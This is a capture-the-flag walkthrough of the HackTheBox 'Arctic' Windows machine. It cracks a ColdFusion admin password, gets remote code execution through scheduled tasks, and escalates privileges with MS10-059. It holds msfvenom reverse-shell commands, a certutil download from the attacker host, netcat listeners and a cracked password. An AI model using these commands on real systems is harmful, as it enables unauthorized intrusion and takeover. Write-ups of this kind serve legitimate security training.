Hackthebox - Arctic
Windows
Nmap
FMTP
I find this fmtp protocol quite odd. Google was kinda frustrating on this, so I just decided to try going to the service with the browser: http://10.10.10.11:8500/
Let's try to get all files and folders with
wget -r --no-parent http://10.10.10.11:8500/
(it will take a while)
The files seem to be related to ColdFusion, which is an Adobe tool for developing web apps.
These slides by Chris Gates about ColdFusion are very useful. This wiki by nets.ec is also very useful.
Another useful article here
We have a login panel here: http://10.10.10.11:8500/CFIDE/administrator/
We have the admin's password hash.
If we go on crackstation.net we can easily find the password:
happyday
We can then connect to the panel
If we follow the slides by Chris Gates (page 85), it turns out we can get RCE using the scheduled tasks.
Let's make a reverse shell exe file with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe > shell.exe
if you catch it with meterpreter, or
msfvenom -p windows/shell/reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f exe > shell.exe
if you catch it with netcat.
Set up a listener
rlwrap nc -lvp 4444
We serve our exe
python3 -m http.server 80
Now, to execute it, we have to click on "Schedule New Task". Let's make it run every minute and a half (the interval has to be greater than 60 seconds).
the url is going to be
http://10.10.14.2/shell.exe
For some reason the chars were written in Greek, so I had to write am and pm in Greek... I do not speak Greek at all, but Google showed me how to write am in Greek. See here: https://www.proz.com/kudoz/english-to-greek/general-conversation-greetings-letters/684823-am-pm.html
NOTE: I found out later that the time does not matter; we can basically launch the tasks manually.
Ok, another try without the Greek chars, because it does not seem to work well: if I type only
08:30
instead of 8:37 πμ
the task is scheduled.
Now let's do our system probe (page 87 of the slides)
I do not get a shell this way, either with meterpreter or nc, even though the files are being fetched from my http server.
Let's try to upload another type of payload and execute it through the directory listing misconfiguration. Let's try JSP (according to the docs, "ColdFusion pages and JSP pages can interoperate in several ways"; see here).
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.2 LPORT=5555 -f raw > shell.jsp
We generate our jsp shell
rlwrap nc -lvp 5555
We set our listener
We upload it to our target with the scheduled task
This time our URL is
http://10.10.14.2/shell.jsp
Let's click on it and pray to catch the shell this time :)
We get a shell as tolis.
Another way (without needing the password) would have been to use Metasploit or a script like this one:
We would take the python script in our target,
Generate the jsp with msfvenom,
Setup our listener,
And launch the python script that will upload our shell to the target
Navigate to the page with our shell
Privesc
Let's run systeminfo and copy the output into a file to find an exploit.
We can use Windows exploit suggester on it
wes --update
First we update the db. Then we pass it our file
wes sysinfo.txt
We can focus on privesc with this command
wes sysinfo.txt | grep -A8 "Elevation of Privilege"
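To see the kind of data wes works from, here is an added example (not from the writeup and not wes itself) that parses systeminfo output into the OS version and installed hotfix list, then reports which patches from a required list are missing; the systeminfo text and KB numbers are constructed placeholders, not the box's real output.

```python
import re
from typing import Any, Dict, List

# Constructed systeminfo output in the tool's real layout; KB numbers are placeholders.
SAMPLE_SYSINFO = """\
Host Name:                 EXAMPLE-HOST
OS Name:                   Microsoft Windows Server 2008 R2 Standard
OS Version:                6.1.7600 N/A Build 7600
System Type:               x64-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB0000001
                           [02]: KB0000002
Network Card(s):           1 NIC(s) Installed.
                           [01]: Example Adapter
"""


def parse_systeminfo(text: str) -> Dict[str, Any]:
    """Extract OS name, OS version string and installed hotfix IDs from systeminfo output."""
    info: Dict[str, Any] = {"os_name": "", "os_version": "", "hotfixes": []}
    in_hotfixes = False
    for line in text.splitlines():
        # A line starting at column 0 with "Key:" begins a new field.
        m = re.match(r"^(\S[^:]*):\s*(.*)$", line)
        if m:
            key, value = m.group(1).strip(), m.group(2).strip()
            in_hotfixes = key == "Hotfix(s)"
            if key == "OS Name":
                info["os_name"] = value
            elif key == "OS Version":
                info["os_version"] = value
            continue
        # Indented "[NN]: KBxxxxxxx" lines are only collected under the Hotfix(s) field,
        # so the similarly indented NIC entries are ignored.
        if in_hotfixes:
            kb = re.search(r"\[\d+\]:\s*(KB\d+)", line)
            if kb:
                info["hotfixes"].append(kb.group(1))
    return info


def missing_hotfixes(info: Dict[str, Any], required: List[str]) -> List[str]:
    """Return the required KBs that are not installed, in the order given."""
    installed = set(info["hotfixes"])
    return [kb for kb in required if kb not in installed]


if __name__ == "__main__":
    parsed = parse_systeminfo(SAMPLE_SYSINFO)
    print(parsed["os_name"], parsed["os_version"])
    print("missing:", missing_hotfixes(parsed, ["KB0000002", "KB0000003"]))
```

A host that reports "Hotfix(s): N/A" yields an empty list, so every required KB comes back as missing.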
We get this one here, which is MS10-059.
Let's fetch the exploit on our attacking machine
wget https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS10-059/MS10-059.exe
We serve it with the python web server
We fetch it on our target
certutil.exe -urlcache -f http://10.10.14.2/MS10-059.exe MS10-059.exe
We set up a listener
rlwrap nc -lvp 5556
MS10-059.exe 10.10.14.2 5556
We run our exploit (and wait a little).